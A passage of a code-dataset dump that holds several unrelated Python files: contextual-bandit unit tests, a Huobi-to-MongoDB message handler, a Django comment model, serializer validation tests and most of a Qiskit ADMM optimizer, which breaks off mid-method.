)._get_actions()\n self.assertListEqual(actions3, [10, 12, 14])\n\n def test_get_actions_one_hot(self):\n actions_one_hot = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=1,\n )._get_actions_one_hot(12)\n assert_array_equal(actions_one_hot, np.array([0, 0, 1, 0, 0, 0]))\n\n def test_log_example(self):\n context = np.array([1, 2, 3])\n action = 11\n cost = 100\n prob = 0.75\n\n # uncategorized actions\n cacb_1 = ContinuousActionContextualBanditModel(\n min_value=10, max_value=15, action_width=1, categorize_actions=False\n )\n cacb_1._log_example(context, action, cost, prob)\n assert_array_equal(\n cacb_1.logged_data, np.array([0.75, 100, 11, 1, 2, 3]).reshape(1, -1)\n )\n\n # categorized actions\n cacb_2 = ContinuousActionContextualBanditModel(\n min_value=10, max_value=15, action_width=1, categorize_actions=True\n )\n cacb_2._log_example(context, action, cost, prob)\n assert_array_equal(\n cacb_2.logged_data,\n np.array([0.75, 100, 0, 1, 0, 0, 0, 0, 1, 2, 3]).reshape(1, -1),\n )\n\n # log another example\n cacb_2._log_example(context, 10, 90, 0.90)\n assert_array_equal(\n cacb_2.logged_data,\n np.array(\n [\n np.array([0.75, 100, 0, 1, 0, 0, 0, 0, 1, 2, 3]),\n np.array([0.90, 90, 1, 0, 0, 0, 0, 0, 1, 2, 3]),\n ]\n ),\n )\n\n def test_exploit(self):\n cacb = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=1,\n )\n\n # lowest cost exists\n costs_per_action = {\n 10.0: 100.0,\n 11.0: 100.0,\n 12.0: 90.0,\n 13.0: 100.0,\n 14.0: 100.0,\n 15.0: 100.0,\n }\n epsilon = 0.10\n action, prob = cacb._exploit(costs_per_action, epsilon)\n self.assertEqual(action, 12.0)\n self.assertEqual(prob, 0.90)\n\n # no clear winner => should choose the first of the best\n costs_per_action = {\n 10.0: 100.0,\n 11.0: 90.0,\n 12.0: 100.0,\n 13.0: 90.0,\n 14.0: 90.0,\n 15.0: 100.0,\n }\n epsilon = 0.10\n action, prob = cacb._exploit(costs_per_action, epsilon)\n self.assertEqual(action, 11.0)\n self.assertEqual(prob, 0.90)\n\n def test_explore(self):\n cacb = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=1,\n )\n # the best action is 12\n costs_per_action = {\n 10.0: 100.0,\n 11.0: 100.0,\n 12.0: 90.0,\n 13.0: 100.0,\n 14.0: 100.0,\n 15.0: 100.0,\n }\n\n # exploration width = 1\n epsilon = 0.10\n exploration_width = 1\n action, prob = cacb._explore(costs_per_action, epsilon, exploration_width)\n self.assertEqual(prob, 0.05)\n self.assertIn(action, [11, 13])\n\n # exploration direction = left\n epsilon = 0.10\n exploration_width = 1\n direction = \"left\"\n action, prob = cacb._explore(\n costs_per_action, epsilon, exploration_width, direction\n )\n self.assertEqual(prob, 0.10)\n self.assertEqual(action, 11)\n\n # exploration width = 2\n epsilon = 0.10\n exploration_width = 2\n action, prob = cacb._explore(costs_per_action, epsilon, exploration_width)\n self.assertEqual(prob, 0.025)\n self.assertIn(action, [10, 11, 13, 14])\n\n # exploration width = 1, optimum in the end\n costs_per_action = {\n 10.0: 90.0,\n 11.0: 100.0,\n 12.0: 100.0,\n 13.0: 100.0,\n 14.0: 100.0,\n 15.0: 100.0,\n }\n epsilon = 0.10\n exploration_width = 1\n action, prob = cacb._explore(costs_per_action, epsilon, exploration_width)\n self.assertEqual(prob, 0.10)\n self.assertEqual(action, 11)\n\n # exploration width = 1, optimum in the left end, left direction\n costs_per_action = {\n 10.0: 90.0,\n 11.0: 100.0,\n 12.0: 100.0,\n 13.0: 100.0,\n 14.0: 100.0,\n 15.0: 100.0,\n }\n epsilon = 0.10\n exploration_width = 1\n action, prob = cacb._explore(\n costs_per_action, epsilon, exploration_width, direction=\"left\"\n )\n self.assertEqual(prob, 0.10)\n self.assertEqual(action, 10)\n\n def test_existing_data(self):\n cacb = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=1,\n data_file=mock_file,\n )\n self.assertEqual(cacb.logged_data.shape[0], 5)\n cacb.learn(np.array([0, 0, 1]), 0, 100, 0.90)\n log_file_data = pd.read_csv(mock_file, header=None).values # type: ignore\n self.assertEqual(log_file_data.shape[0], 6)\n\n def test_existing_data_and_memory(self):\n cacb = ContinuousActionContextualBanditModel(\n min_value=10, max_value=15, action_width=1, data_file=mock_file, memory=10\n )\n self.assertEqual(cacb.logged_data.shape[0], 5)\n\n cacb = ContinuousActionContextualBanditModel(\n min_value=10, max_value=15, action_width=1, data_file=mock_file, memory=3\n )\n self.assertEqual(cacb.logged_data.shape[0], 3)\n self.assertListEqual(list(cacb.logged_data[-1]), [0.0333, 120, 4, 1, 1, 0])\n cacb._log_example(np.array([0, 1, 1]), 1, 105, 0.0333)\n self.assertEqual(cacb.logged_data.shape[0], 3)\n self.assertListEqual(list(cacb.logged_data[-1]), [0.0333, 105, 1, 0, 1, 1])\n\n def test_get_previous_move(self):\n cacb = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=1,\n data_file=mock_file,\n )\n self.assertEqual(cacb._get_previous_move(0.1), (True, 10.0, 2.0))\n\n def tearDown(self):\n os.remove(mock_file)\n","sub_path":"tests/test_cacb.py","file_name":"test_cacb.py","file_ext":"py","file_size_in_byte":7527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"117081630","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/5/25 0025 14:52\n# @Author : Hadrianl \n# @File : handler.py\n# @Contact : 137150224@qq.com\n\nimport pymongo as pmo\nfrom .utils import logger, handler_profiler\nfrom threading import Thread\nfrom queue import Queue,Empty\nfrom abc import abstractmethod\n\nclass baseHandler():\n def __init__(self, name, topic: (str, list)=None):\n self.name = name\n self.topic = set(topic if isinstance(topic, list) else [topic]) if topic !=None else set()\n self.thread = Thread(name=self.name)\n self.queue = Queue()\n\n def run(self):\n while True:\n try:\n msg = self.queue.get(timeout=5)\n if msg == None: # 向队列传入None来作为结束信号\n break\n\n if self.topic == set():\n self.handle(msg)\n else:\n topic = msg.get('ch') or msg.get('rep')\n print(topic)\n if topic and topic in self.topic:\n self.handle(msg)\n except Empty:\n ...\n except Exception as e:\n logger.exception(f'-{self.name} exception:{e}')\n\n def add_topic(self, new_topic):\n self.topic.add(new_topic)\n\n def remove_topic(self, topic):\n self.topic.remove(topic)\n\n def stop(self):\n self.queue.put(None)\n self.thread.join()\n self.queue = Queue()\n\n def start(self):\n self.thread = Thread(target=self.run, name=self.name)\n self.thread.setDaemon(True)\n self.thread.start()\n\n @abstractmethod\n def handle(self, msg): # 所有handler需要重写这个函数\n ...\n\n def __call__(self, msg):\n if self.thread.is_alive():\n self.queue.put(msg)\n\n\nclass DBHandler(baseHandler, pmo.MongoClient):\n def __init__(self, topic=None, host='localhost', port=27017, db='HuoBi'):\n baseHandler.__init__(self, 'DB', topic)\n pmo.MongoClient.__init__(self, host, port)\n self.db = self.get_database(db)\n\n def into_db(self, data, topic:str):\n collection = self.db.get_collection(topic)\n try:\n if 'kline' in topic:\n if isinstance(data, dict):\n collection.update({'id': data['id']}, data, upsert=True)\n elif isinstance(data, list):\n for d in data:\n collection.update({'id': d['id']}, d, upsert=True)\n elif 'trade.detail' in topic:\n for d in data:\n collection.update({'id': d['id']}, d, upsert=True)\n except Exception as e:\n logger.error(f'<数据>插入数据库错误-{e}')\n\n @handler_profiler\n def handle(self, msg):\n if 'ch' in msg or 'rep' in msg:\n topic = msg.get('ch') or msg.get('rep')\n data = msg.get('tick') or msg.get('data')\n self.into_db(data, topic)\n\n\n","sub_path":"huobitrade/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"165539954","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom post.models import Post\nfrom django.utils import timezone\nimport datetime\n# Create your models here.\n\n\nclass Comment(models.Model):\n body = models.TextField(max_length=2000)\n author = models.ForeignKey(User, blank=True)\n post = models.ForeignKey(Post)\n enable = models.BooleanField(default=True)\n pub_date = models.DateTimeField(auto_now_add=True)\n patch_date = models.DateTimeField(default=timezone.now())\n likes = models.ManyToManyField(\n User,\n related_name='comment_likes',\n blank=True,\n editable=False\n )\n image = models.ImageField(\n upload_to='comment/%s' % (timezone.now().strftime('%y%m%d')),\n blank=True,\n null=True\n )\n\n def was_published_recently(self):\n now = timezone.now()\n return now - datetime.timedelta(minutes=30) <= self.pub_date <= now\n\n def count_likes(self):\n return self.likes.count()\n\n def __unicode__(self):\n return \"Comment to %s\" % self.post\n","sub_path":"comment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"114794610","text":"# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\n\nfrom formidable.models import Formidable\nfrom formidable.serializers.validation import (\n MinLengthSerializer, RegexpSerializer,\n ValidationSerializer\n)\n\n\nclass ValidationSerializerTest(TestCase):\n\n def setUp(self):\n super(ValidationSerializerTest, self).setUp()\n self.form = Formidable.objects.create(\n label=u'test', description=u'test'\n )\n self.text = self.form.fields.create(\n type_id=u'text', slug=u'input-text', label=u'name',\n )\n\n def test_int_value(self):\n data = {'field_id': self.text.id, 'value': 5, 'type': 'minlength'}\n serializer = MinLengthSerializer(data=data)\n self.assertTrue(serializer.is_valid())\n\n def test_non_int_value(self):\n data = {'field_id': self.text.id, 'value': 'test', 'type': 'minlength'}\n serializer = MinLengthSerializer(data=data)\n self.assertFalse(serializer.is_valid())\n\n def test_regexp_value(self):\n data = {\n 'field_id': self.text.id, 'value': u'\\w+ly', 'type': 'minlength'\n }\n serializer = RegexpSerializer(data=data)\n self.assertTrue(serializer.is_valid())\n\n def test_invalid_regexp_value(self):\n data = {\n 'field_id': self.text.id, 'value': u'\\w+ly(', 'type': 'minlength'\n }\n serializer = RegexpSerializer(data=data)\n self.assertFalse(serializer.is_valid())\n\n def test_update_validations(self):\n list_serializer = ValidationSerializer(many=True)\n self.text.validations.create(\n value=u'5', type=u'minlength'\n )\n list_serializer.update(\n self.text.validations,\n [{'type': 'minlength', 'value': '12'}],\n self.text\n )\n self.assertEquals(self.text.validations.count(), 1)\n validation = self.text.validations.first()\n self.assertEquals(validation.value, '12')\n","sub_path":"demo/tests/serializers/tests_validations.py","file_name":"tests_validations.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"555844544","text":"# -*- coding: utf-8 -*-\n\n# This code is part of Qiskit.\n#\n# (C) Copyright IBM 2020.\n#\n# This code is licensed under the Apache License, Version 2.0. You may\n# obtain a copy of this license in the LICENSE.txt file in the root directory\n# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Any modifications or derivative works of this code must retain this\n# copyright notice, and modified files need to carry a notice indicating\n# that they have been altered from the originals.\n\n\"\"\"An implementation of the ADMM algorithm.\"\"\"\nimport logging\nimport time\nfrom typing import List, Optional, Any\n\nimport numpy as np\nfrom cplex import SparsePair\nfrom qiskit.optimization.algorithms.cplex_optimizer import CplexOptimizer\nfrom qiskit.optimization.algorithms.optimization_algorithm import OptimizationAlgorithm\nfrom qiskit.optimization.problems.optimization_problem import OptimizationProblem\nfrom qiskit.optimization.problems.variables import CPX_BINARY, CPX_CONTINUOUS\nfrom qiskit.optimization.results.optimization_result import OptimizationResult\n\n\nUPDATE_RHO_BY_TEN_PERCENT = 0\nUPDATE_RHO_BY_RESIDUALS = 1\n\n\nclass ADMMParameters:\n \"\"\"Defines a set of parameters for ADMM optimizer.\"\"\"\n\n def __init__(self, rho_initial: float = 10000, factor_c: float = 100000, beta: float = 1000,\n max_iter: int = 10, tol: float = 1.e-4, max_time: float = np.inf,\n three_block: bool = True, vary_rho: int = UPDATE_RHO_BY_TEN_PERCENT,\n tau_incr: float = 2, tau_decr: float = 2, mu_res: float = 10,\n mu_merit: float = 1000) -> None:\n \"\"\"Defines parameters for ADMM optimizer and their default values.\n\n Args:\n rho_initial: Initial value of rho parameter of ADMM.\n factor_c: Penalizing factor for equality constraints, when mapping to QUBO.\n beta: Penalization for y decision variables.\n max_iter: Maximum number of iterations for ADMM.\n tol: Tolerance for the residual convergence.\n max_time: Maximum running time (in seconds) for ADMM.\n three_block: Boolean flag to select the 3-block ADMM implementation.\n vary_rho: Flag to select the rule to update rho.\n If set to 0, then rho increases by 10% at each iteration.\n If set to 1, then rho is modified according to primal and dual residuals.\n tau_incr: Parameter used in the rho update (UPDATE_RHO_BY_RESIDUALS).\n The update rule can be found in:\n Boyd, S., Parikh, N., Chu, E., Peleato, B., & Eckstein, J. (2011).\n Distributed optimization and statistical learning via the alternating\n direction method of multipliers.\n Foundations and Trends® in Machine learning, 3(1), 1-122.\n tau_decr: Parameter used in the rho update (UPDATE_RHO_BY_RESIDUALS).\n mu_res: Parameter used in the rho update (UPDATE_RHO_BY_RESIDUALS).\n mu_merit: Penalization for constraint residual. Used to compute the merit values.\n \"\"\"\n super().__init__()\n self.mu_merit = mu_merit\n self.mu_res = mu_res\n self.tau_decr = tau_decr\n self.tau_incr = tau_incr\n self.vary_rho = vary_rho\n self.three_block = three_block\n self.max_time = max_time\n self.tol = tol\n self.max_iter = max_iter\n self.factor_c = factor_c\n self.beta = beta\n self.rho_initial = rho_initial\n\n\nclass ADMMState:\n \"\"\"Internal computation state of the ADMM implementation.\n\n The state keeps track of various variables are stored that are being updated during problem\n solving. The values are relevant to the problem being solved. The state is recreated for each\n optimization problem. State is returned as the third value.\n \"\"\"\n\n def __init__(self,\n op: OptimizationProblem,\n binary_indices: List[int],\n continuous_indices: List[int],\n rho_initial: float) -> None:\n \"\"\"Constructs an internal computation state of the ADMM implementation.\n\n Args:\n op: The optimization problem being solved.\n binary_indices: Indices of the binary decision variables of the original problem.\n continuous_indices: Indices of the continuous decision variables of the original\n problem.\n rho_initial: Initial value of the rho parameter.\n \"\"\"\n super().__init__()\n\n # Optimization problem itself\n self.op = op\n # Indices of the variables\n self.binary_indices = binary_indices\n self.continuous_indices = continuous_indices\n self.sense = op.objective.get_sense()\n\n # define heavily used matrix, they are used at each iteration, so let's cache them,\n # they are np.ndarrays\n # pylint:disable=invalid-name\n # objective\n self.q0 = None\n self.c0 = None\n self.q1 = None\n self.c1 = None\n # constraints\n self.a0 = None\n self.b0 = None\n self.a1 = None\n self.b1 = None\n self.a2 = None\n self.a3 = None\n self.b2 = None\n self.a4 = None\n self.b3 = None\n\n # These are the parameters that are updated in the ADMM iterations.\n self.u: np.ndarray = np.zeros(len(continuous_indices))\n binary_size = len(binary_indices)\n self.x0: np.ndarray = np.zeros(binary_size)\n self.z: np.ndarray = np.zeros(binary_size)\n self.z_init: np.ndarray = self.z\n self.y: np.ndarray = np.zeros(binary_size)\n self.lambda_mult: np.ndarray = np.zeros(binary_size)\n\n # The following structures store quantities obtained in each ADMM iteration.\n self.cost_iterates = []\n self.residuals = []\n self.dual_residuals = []\n self.cons_r = []\n self.merits = []\n self.lambdas = []\n self.x0_saved = []\n self.u_saved = []\n self.z_saved = []\n self.y_saved = []\n self.rho = rho_initial\n\n\nclass ADMMOptimizerResult(OptimizationResult):\n \"\"\" ADMMOptimizer Result.\"\"\"\n\n def __init__(self, x: Optional[Any] = None, fval: Optional[Any] = None,\n state: Optional[ADMMState] = None) -> None:\n super().__init__(x, fval, state)\n self._state = state\n\n @property\n def state(self) -> Optional[ADMMState]:\n \"\"\" returns state \"\"\"\n return self._state\n\n\nclass ADMMOptimizer(OptimizationAlgorithm):\n \"\"\"An implementation of the ADMM-based heuristic introduced here:\n Gambella, C., & Simonetto, A. (2020).\n Multi-block ADMM Heuristics for Mixed-Binary Optimization on Classical and Quantum Computers.\n arXiv preprint arXiv:2001.02069.\n \"\"\"\n\n def __init__(self, qubo_optimizer: Optional[OptimizationAlgorithm] = None,\n continuous_optimizer: Optional[OptimizationAlgorithm] = None,\n params: Optional[ADMMParameters] = None) -> None:\n \"\"\"Constructs an instance of ADMMOptimizer.\n\n Args:\n qubo_optimizer: An instance of OptimizationAlgorithm that can effectively solve\n QUBO problems.\n continuous_optimizer: An instance of OptimizationAlgorithm that can solve\n continuous problems.\n params: An instance of ADMMParameters.\n \"\"\"\n\n super().__init__()\n self._log = logging.getLogger(__name__)\n\n # create default params if not present\n self._params = params or ADMMParameters()\n\n # create optimizers if not specified\n self._qubo_optimizer = qubo_optimizer or CplexOptimizer()\n self._continuous_optimizer = continuous_optimizer or CplexOptimizer()\n\n # internal state where we'll keep intermediate solution\n # here, we just declare the class variable, the variable is initialized in kept in\n # the solve method.\n self._state: Optional[ADMMState] = None\n\n def is_compatible(self, problem: OptimizationProblem) -> Optional[str]:\n \"\"\"Checks whether a given problem can be solved with the optimizer implementing this method.\n\n Args:\n problem: The optimization problem to check compatibility.\n\n Returns:\n Returns ``None`` if the problem is compatible and else a string with the error message.\n \"\"\"\n\n # 1. only binary and continuous variables are supported\n for var_type in problem.variables.get_types():\n if var_type not in (CPX_BINARY, CPX_CONTINUOUS):\n # variable is not binary and not continuous.\n return \"Only binary and continuous variables are supported\"\n\n binary_indices = self._get_variable_indices(problem, CPX_BINARY)\n continuous_indices = self._get_variable_indices(problem, CPX_CONTINUOUS)\n\n # 2. binary and continuous variables are separable in objective\n for binary_index in binary_indices:\n for continuous_index in continuous_indices:\n coeff = problem.objective.get_quadratic_coefficients(binary_index, continuous_index)\n if coeff != 0:\n # binary and continuous vars are mixed.\n return \"Binary and continuous variables are not separable in the objective\"\n\n # 3. no quadratic constraints are supported.\n quad_constraints = problem.quadratic_constraints.get_num()\n if quad_constraints is not None and quad_constraints > 0:\n # quadratic constraints are not supported.\n return \"Quadratic constraints are not supported\"\n\n return None\n\n def solve(self, problem: OptimizationProblem) -> ADMMOptimizerResult:\n \"\"\"Tries to solves the given problem using ADMM algorithm.\n\n Args:\n problem: The problem to be solved.\n\n Returns:\n The result of the optimizer applied to the problem.\n\n Raises:\n QiskitOptimizationError: If the problem is incompatible with the optimizer.\n \"\"\"\n # parse problem and convert to an ADMM specific representation.\n binary_indices = self._get_variable_indices(problem, CPX_BINARY)\n continuous_indices = self._get_variable_indices(problem, CPX_CONTINUOUS)\n\n # create our computation state.\n self._state = ADMMState(problem, binary_indices,\n continuous_indices, self._params.rho_initial)\n\n # convert optimization problem to a set of matrices and vector that are used\n # at each iteration.\n self._convert_problem_representation()\n\n start_time = time.time()\n # we have not stated our computations yet, so elapsed time initialized as zero.\n elapsed_time = 0\n iteration = 0\n residual = 1.e+2\n\n while (iteration < self._params.max_iter and residual > self._params.tol) \\\n and (elapsed_time < self._params.max_time):\n if binary_indices:\n op1 = self._create_step1_problem()\n self._state.x0 = self._update_x0(op1)\n # else, no binary variables exist,\n # and no update to be done in this case.\n # debug\n self._log.debug(\"x0=%s\", self._state.x0)\n\n op2 = self._create_step2_problem()\n self._state.u, self._state.z = self._update_x1(op2)\n # debug\n self._log.debug(\"u=%s\", self._state.u)\n self._log.debug(\"z=%s\", self._state.z)\n\n if self._params.three_block:\n if binary_indices:\n op3 = self._create_step3_problem()\n self._state.y = self._update_y(op3)\n # debug\n self._log.debug(\"y=%s\", self._state.y)\n\n lambda_mult = self._update_lambda_mult()\n\n cost_iterate = self._get_objective_value()\n constraint_residual = self._get_constraint_residual()\n residual, dual_residual = self._get_solution_residuals(iteration)\n merit = self._get_merit(cost_iterate, constraint_residual)\n # debug\n self._log.debug(\"cost_iterate=%s, cr=%s, merit=%s\",\n cost_iterate, constraint_residual, merit)\n\n # costs and merits are saved with their original sign.\n self._state.cost_iterates.append(self._state.sense * cost_iterate)\n self._state.residuals.append(residual)\n self._state.dual_residuals.append(dual_residual)\n self._state.cons_r.append(constraint_residual)\n self._state.merits.append(merit)\n self._state.lambdas.append(np.linalg.norm(lambda_mult))\n\n self._state.x0_saved.append(self._state.x0)\n self._state.u_saved.append(self._state.u)\n self._state.z_saved.append(self._state.z)\n self._state.z_saved.append(self._state.y)\n\n self._update_rho(residual, dual_residual)\n\n iteration += 1\n elapsed_time = time.time() - start_time\n\n solution, objective_value = self._get_best_merit_solution()\n solution = self._revert_solution_indexes(solution)\n\n # third parameter is our internal state of computations.\n result = ADMMOptimizerResult(solution, objective_value, self._state)\n # debug\n self._log.debug(\"solution=%s, objective=%s at iteration=%s\",\n solution, objective_value, iteration)\n return result\n\n @staticmethod\n def _get_variable_indices(op: OptimizationProblem, var_type: str) -> List[int]:\n \"\"\"Returns a list of indices of the variables of the specified type.\n\n Args:\n op: Optimization problem.\n var_type: type of variables to look for.\n\n Returns:\n List of indices.\n \"\"\"\n indices = []\n for i, variable_type in enumerate(op.variables.get_types()):\n if variable_type == var_type:\n indices.append(i)\n\n return indices\n\n def _revert_solution_indexes(self, internal_solution: List[np.ndarray]) \\\n -> np.ndarray:\n \"\"\"Constructs a solution array where variables are stored in the correct order.\n\n Args:\n internal_solution: a list with two lists: solutions for binary variables and\n for continuous variables.\n\n Returns:\n A solution array.\n \"\"\"\n binary_solutions, continuous_solutions = internal_solution\n solution = np.zeros(len(self._state.binary_indices) + len(self._state.continuous_indices))\n # restore solution at the original index location\n for i, binary_index in enumerate(self._state.binary_indices):\n solution[binary_index] = binary_solutions[i]\n for i, continuous_index in enumerate(self._state.continuous_indices):\n solution[continuous_index] = continuous_solutions[i]\n return solution\n\n def _convert_problem_representation(self) -> None:\n \"\"\"Converts problem representation into set of matrices and vectors.\n Specifically, the optimization problem is represented as:\n\n min_{x0, u} x0^T q0 x0 + c0^T x0 + u^T q1 u + c1^T u\n\n s.t. a0 x0 = b0\n a1 x0 <= b1\n a2 z + a3 u <= b2\n a4 u <= b3\n\n \"\"\"\n # objective\n self._state.q0 = self._get_q(self._state.binary_indices)\n self._state.c0 = self._get_c(self._state.binary_indices)\n self._state.q1 = self._get_q(self._state.continuous_indices)\n self._state.c1 = self._get_c(self._state.continuous_indices)\n # constraints\n self._state.a0, self._state.b0 = self._get_a0_b0()\n self._state.a1, self._state.b1 = self._get_a1_b1()\n self._state.a2, self._state.a3, self._state.b2 = self._get_a2_a3_b2()\n self._state.a4, self._state.b3 = self._get_a4_b3()\n\n def _get_q(self, variable_indices: List[int]) -> np.ndarray:\n \"\"\"Constructs a quadratic matrix for the variables with the specified indices\n from the quadratic terms in the objective.\n\n Args:\n variable_indices: variable indices to look for.\n\n Returns:\n A matrix as a numpy array of the shape(len(variable_indices), len(variable_indices)).\n \"\"\"\n size = len(variable_indices)\n q = np.zeros(shape=(size, size))\n # fill in the matrix\n # in fact we use re-indexed variables\n for i, var_index_i in enumerate(variable_indices):\n for j, var_index_j in enumerate(variable_indices):\n q[i, j] = self._state.op.objective.get_quadratic_coefficients(\n var_index_i,\n var_index_j)\n\n # flip the sign, according to the optimization sense, e.g. sense == 1 if minimize,\n # sense == -1 if maximize.\n return q * self._state.sense\n\n def _get_c(self, variable_indices: List[int]) -> np.ndarray:\n \"\"\"Constructs a vector for the variables with the specified indices from the linear terms\n in the objective.\n\n Args:\n variable_indices: variable indices to look for.\n\n Returns:\n A numpy array of the shape(len(variable_indices)).\n \"\"\"\n c = np.array(self._state.op.objective.get_linear(variable_indices))\n # flip the sign, according to the optimization sense, e.g. sense == 1 if minimize,\n # sense == -1 if maximize.\n c *= self._state.sense\n return c\n\n def _assign_row_values(self, matrix: List[List[float]], vector: List[float],\n constraint_index: int, variable_indices: List[int]):\n \"\"\"Appends a row to the specified matrix and vector based on the constraint specified by\n the index using specified variables.\n\n Args:\n matrix: a matrix to extend.\n vector: a vector to expand.\n constraint_index: constraint index to look for.\n variable_indices: variables to look for.\n\n Returns:\n None\n \"\"\"\n # assign matrix row.\n row = []\n for var_index in variable_indices:\n row.append(self._state.op\n .linear_constraints.get_coefficients(constraint_index, var_index))\n matrix.append(row)\n\n # assign vector row.\n vector.append(self._state.op.linear_constraints.get_rhs(constraint_index))\n\n # flip the sign if constraint is G, we want L constraints.\n if self._state.op.linear_constraints.get_senses(constraint_index) == \"G\":\n # invert the sign to make constraint \"L\".\n matrix[-1] = [-1 * el for el in matrix[-1]]\n vector[-1] = -1 * vector[-1]\n\n @staticmethod\n def _create_ndarrays(matrix: List[List[float]], vector: List[float], size: int) \\\n -> (np.ndarray, np.ndarray):\n \"\"\"Converts representation of a matrix and a vector in form of lists to numpy array.\n\n Args:\n matrix: matrix to convert.\n vector: vector to convert.\n size: size to create matrix and vector.\n\n Returns:\n Converted matrix and vector as numpy arrays.\n \"\"\"\n # if we don't have such constraints, return just dummy arrays.\n if len(matrix) != 0:\n return np.array(matrix), np.array(vector)\n else:\n return np.array([0] * size).reshape((1, -1)), np.zeros(shape=(1,))\n\n def _get_a0_b0(self) -> (np.ndarray, np.ndarray):\n \"\"\"Constructs a matrix and a vector from the constraints in a form of Ax = b, where\n x is a vector of binary variables.\n\n Returns:\n Corresponding matrix and vector as numpy arrays.\n\n Raises:\n ValueError: if the problem is not suitable for this optimizer.\n \"\"\"\n matrix = []\n vector = []\n\n senses = self._state.op.linear_constraints.get_senses()\n index_set = set(self._state.binary_indices)\n for constraint_index, sense in enumerate(senses):\n # we check only equality constraints here.\n if sense != \"E\":\n continue\n row = self._state.op.linear_constraints.get_rows(constraint_index)\n if set(row.ind).issubset(index_set):\n self._assign_row_values(matrix, vector,\n constraint_index, self._state.binary_indices)\n else:\n raise ValueError(\n \"Linear constraint with the 'E' sense must contain only binary variables, \"\n \"row indices: {}, binary variable indices: {}\"\n .format(row, self._state.binary_indices))\n\n return self._create_ndarrays(matrix, vector, len(self._state.binary_indices))\n\n def _get_inequality_matrix_and_vector(self, variable_indices: List[int]) \\\n -> (List[List[float]], List[float]):\n \"\"\"Constructs a matrix and a vector from the constraints in a form of Ax <= b, where\n x is a vector of variables specified by the indices.\n\n Args:\n variable_indices: variable indices to look for.\n\n Returns:\n A list based representation of the matrix and the vector.\n \"\"\"\n matrix = []\n vector = []\n senses = self._state.op.linear_constraints.get_senses()\n\n index_set = set(variable_indices)\n for constraint_index, sense in enumerate(senses):\n if sense in (\"E\", \"R\"):\n # TODO: Ranged constraints should be supported\n continue\n # sense either G or L.\n row = self._state.op.linear_constraints.get_rows(constraint_index)\n if set(row.ind).issubset(index_set):\n self._assign_row_values(matrix, vector, constraint_index, variable_indices)\n\n return matrix, vector\n\n def _get_a1_b1(self) -> (np.ndarray, np.ndarray):\n \"\"\"Constructs a matrix and a vector from the constraints in a form of Ax <= b, where\n x is a vector of binary variables.\n\n Returns:\n A numpy based representation of the matrix and the vector.\n \"\"\"\n matrix, vector = self._get_inequality_matrix_and_vector(self._state.binary_indices)\n return self._create_ndarrays(matrix, vector, len(self._state.binary_indices))\n\n def _get_a4_b3(self) -> (np.ndarray, np.ndarray):\n \"\"\"Constructs a matrix and a vector from the constraints in a form of Au <= b, where\n u is a vector of continuous variables.\n\n Returns:\n A numpy based representation of the matrix and the vector.\n \"\"\"\n matrix, vector = self._get_inequality_matrix_and_vector(self._state.continuous_indices)\n return self._create_ndarrays(matrix, vector, len(self._state.continuous_indices))\n\n def _get_a2_a3_b2(self) -> (np.ndarray, np.ndarray, np.ndarray):\n \"\"\"Constructs matrices and a vector from the constraints in a form of A_2x + A_3u <= b,\n where x is a vector of binary variables and u is a vector of continuous variables.\n\n Returns:\n A numpy representation of two matrices and one vector.\n \"\"\"\n matrix = []\n vector = []\n senses = self._state.op.linear_constraints.get_senses()\n\n binary_index_set = set(self._state.binary_indices)\n continuous_index_set = set(self._state.continuous_indices)\n all_variables = self._state.binary_indices + self._state.continuous_indices\n for constraint_index, sense in enumerate(senses):\n if sense in (\"E\", \"R\"):\n # TODO: Ranged constraints should be supported as well\n continue\n # sense either G or L.\n row = self._state.op.linear_constraints.get_rows(constraint_index)\n row_indices = set(row.ind)\n # we must have a least one binary and one continuous variable,\n # otherwise it is another type of constraints.\n if len(row_indices & binary_index_set) != 0 and len(\n row_indices & continuous_index_set) != 0:\n self._assign_row_values(matrix, vector, constraint_index, all_variables)\n\n # pylint:disable=invalid-name\n matrix, b2 = self._create_ndarrays(matrix, vector, len(all_variables))\n # a2\n a2 = matrix[:, 0:len(self._state.binary_indices)]\n a3 = matrix[:, len(self._state.binary_indices):]\n return a2, a3, b2\n\n def _create_step1_problem(self) -> OptimizationProblem:\n \"\"\"Creates a step 1 sub-problem.\n\n Returns:\n A newly created optimization problem.\n \"\"\"\n op1 = OptimizationProblem()\n\n binary_size = len(self._state.binary_indices)\n # create the same binary variables.\n op1.variables.add(names=[\"x0_\" + str(i + 1) for i in range(binary_size)],\n types=[\"I\"] * binary_size,\n lb=[0.] * binary_size,\n ub=[1.] * binary_size)\n\n # prepare and set quadratic objective.\n # NOTE: The multiplication by 2 is needed for the solvers to parse\n # the quadratic coefficients.\n quadratic_objective = 2 * (\n self._state.q0 +\n self._params.factor_c / 2 * np.dot(self._state.a0.transpose(), self._state.a0) +\n self._state.rho / 2 * np.eye(binary_size)\n )\n for i in range(binary_size):\n for j in range(i, binary_size):\n op1.objective.set_quadratic_coefficients(i, j, quadratic_objective[i, j])\n\n # prepare and set linear objective.\n linear_objective = self._state.c0 - \\\n self._params.factor_c * np.dot(self._state.b0, self._state.a0) + \\\n self._state.rho * (self._state.y - self._state.z)\n\n for i in range(binary_size):\n op1.objective.set_linear(i, linear_objective[i])\n return op1\n\n def _create_step2_problem(self) -> OptimizationProblem:\n \"\"\"Creates a step 2 sub-problem.\n\n Returns:\n A newly created optimization problem.\n \"\"\"\n op2 = OptimizationProblem()\n\n 